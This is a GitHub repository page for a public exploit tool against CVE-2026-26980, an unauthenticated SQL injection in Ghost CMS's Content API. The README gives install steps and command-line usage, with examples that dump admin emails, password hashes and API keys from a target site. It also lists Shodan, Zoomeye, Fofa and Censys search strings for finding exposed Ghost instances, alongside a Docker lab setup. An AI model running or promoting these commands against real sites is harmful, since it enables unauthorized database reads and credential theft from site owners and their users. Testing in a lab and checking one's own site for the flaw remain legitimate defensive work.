Skip to content

vognik/CVE-2026-26980

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

24 Commits
lab
lab
Β 
Β 
LICENSE
LICENSE
Β 
Β 
README.md
README.md
Β 
Β 
main.py
main.py
Β 
Β 
requirements.txt
requirements.txt
Β 
Β 

Repository files navigation

CVE-2026-26980 β€” πŸ‘» Ghost CMS Unauthenticated SQLi via Content API

A SQL injection vulnerability existed in Ghost's Content API that allowed unauthenticated attackers to read arbitrary data from the database.
CVE CVE-2026-26980
CVSS 9.4 (Critical)
Affected Ghost >= 3.24.0, <= 6.19.0
Fixed 6.19.1
Disclosed 2026-02-20
Credit Nicholas Carlini
Public Exploit vognik
Type Unauthenticated SQLi via Content API β†’ Arbitrary DB Read

Installation

git clone https://github.com/vognik/CVE-2026-26980.git
cd CVE-2026-26980
pip install -r ./requirements.txt

How to use

usage: main.py [-h] -u URL [-a KEY] [-p PATH] [-k] [-c MODE] [-d {sqlite,mysql}] [-T NAME] [-C COL1,COL2] [-t N] [-o FILE]

options:
  -h, --help            show this help message and exit

Connection settings:
  -u, --url URL         Set target Ghost instance URL
  -a, --api-key KEY     Set Content API key (skips auto-discovery)
  -p, --api-path PATH   Set Content API path (default: /ghost/api/content/)
  -k, --insecure        Skip SSL certificate verification

Extraction settings:
  -c, --check MODE      Verify vulnerability: passive (meta tags) or active (SQL error)
  -d, --dbms {sqlite,mysql}
                        Select database engine (default: sqlite)
  -T, --table NAME      Set database table to dump (e.g., users, api_keys)
  -C, --columns COL1,COL2
                        Set columns to extract (comma-separated)
  -t, --threads N       Set number of concurrent threads (default: 15)

Output settings:
  -o, --output FILE     Save results to the specified CSV file

Usage examples:
python3 main.py -u http://target.com
(Quickly extract admin email and password hash from a default SQLite setup)

python3 main.py -u http://target.com -c passive
(Check the site for the vulnerability using the meta tag on the main page)

python3 main.py -u http://target.com -d mysql -T users -C email,password -o ./result.csv
(Dump the "email" and "password" columns from the "users" table and save the result to "result.csv")

python3 main.py -u http://target.com -d mysql -T api_keys -t 25
(Dump all API keys from the "api_keys" table using 25 threads)

Note: Most production Ghost instances use MySQL. Local/Small blogs use SQLite.

Demo

demo

Dorks

image
Shodan http.html:"data-ghost="
Zoomeye http.body="data-ghost="
Fofa body="data-ghost="
Censys web.software.vendor = "ghost"

Lab Setup

sqlite

docker run -p 8080:2368 -e database__client=sqlite3 -e database__connection__filename=/var/lib/ghost/content/data/ghost.db -e url=http://localhost:2368 -e port=2368 ghost:6.16.1

mysql

cd lab
docker compose up

Original Research

Nicholas Carlini - Black-hat LLMs | [un]prompted 2026

Watch

πŸ“„ License

This project is licensed under the GPL-3.0 license.
See the LICENSE file for details.

About

πŸ’£ Exploit for CVE-2026-26980 β€” πŸ‘» Ghost CMS Unauthenticated SQLi via Content API

Resources

Readme

License

GPL-3.0 license
Activity

Stars

9 stars

Watchers

0 watching

Forks

2 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors

Languages